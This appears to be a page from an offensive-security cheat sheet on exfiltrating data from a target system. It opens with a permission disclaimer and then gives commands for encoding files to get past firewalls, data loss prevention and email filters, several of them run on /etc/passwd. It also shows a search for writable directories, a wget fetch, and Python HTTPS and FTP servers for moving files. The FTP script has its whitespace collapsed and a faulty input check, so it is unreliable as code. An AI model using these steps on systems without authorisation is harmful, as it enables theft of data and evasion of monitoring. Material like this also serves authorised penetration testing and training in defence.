Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Not much here yet...please feel free to contribute at my GitHub page.
The first step to exfiltration is to avoid being caught. This means avoiding firewalls, data loss prevention, email filters, and more. Encoding/encrypting your payload is a good way to do this.
Preparing files for transport
Base64 encode a file
base64-w0 $file
Base64 decode a file
base64-d $file
Binary files transfer badly over a terminal connection. There are many ways to convert a binary into base64 or similar and make the file terminal friendly. We can then use a technique described further on to transfer a file to and from a remote system using nothing else but the shell/terminal as a transport medium (e.g. no separate connection).
Encode:
$ uuencode /etc/passwd passwd-COPY
begin 644 passwd-COPY
356)U;G1U(#$X+C`T+C(@3%13"@``
`
end
Cut & paste the output (4 lines, starting with 'begin 644 filename') into uudecode to decode:
$ uudecode
begin 644 passwd-COPY
356)U;G1U(#$X+C`T+C(@3%13"@``
`
end
Openssl can also be used to encode files for transport
Encode:
$ openssl base64 < /etc/passwd
Cut & paste the output then transfer and decode:
$ openssl base64 -d > passwd-COPY
You can also use xxd to hex-encode files.
First encode with this command:
$ xxd -p < /etc/passwd
Cut & paste the output into this command: Decode:
$ xxd -p -r passwd-COPY
shar
Use shar to create a self-extracting shell script, which is in text format and can be copied/mailed:
Transfer exfil.shar to the remote system by any means and execute it:
chmod +x exfil.shar
./exfil.shar
tar
A tar file is similar to a standard zip archive
tar cfz - *.py *.c | openssl base64 > exfil.tgz.b64
Transfer exfil.tgz.b64 to the remote system and decode:
openssl base64 -d < exfil.tgz.b64 | tar xfz -
HTTP/HTTPS
One of the easier ways to transfer a file as most devices have web access. Start by finding a directory on the target that you can write to.
# find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;
# wget http://<url> -O url.txt -o /dev/null
Curl has the benefit of being able to transfer with IMAP, POP3, SCP, SFTP, SMB, SMTP, TELNET, TFTP< and other protocols. Experimentation may be needed to figure out what is blocked/allowed by the firewall.
# from https://gist.github.com/dergachev/7028596
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:443
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
FTP
Python FTP server
#!/usr/bin/env python3##Author : Paranoid Ninja#Modified: Zweilos##Descr : Creates a Simple FTP Server in the tmp directoryfrompyftpdlib.authorizersimportDummyAuthorizerfrompyftpdlib.handlersimportFTPHandlerfrompyftpdlib.serversimportFTPServerFTP_PORT=2121FTP_USER="ninja"FTP_PASSWORD="ninja"FTP_DIRECTORY="."defmain():dir=input("Run in the current directory? [y/n]\n")if (dir!="y") or (dir !="Y"):FTP_DIRECTORY=input("Please enter a directory:")authorizer=DummyAuthorizer()authorizer.add_user(FTP_USER,FTP_PASSWORD,FTP_DIRECTORY,perm='elradfmw')handler=FTPHandlerhandler.authorizer=authorizerhandler.banner="Ninja FTP Server"address= ('', FTP_PORT)server=FTPServer(address,handler)server.max_cons=256server.max_cons_per_ip=5server.serve_forever()if__name__=='__main__':main()
You can also use the pyftplib module to quickly and easily set up ftp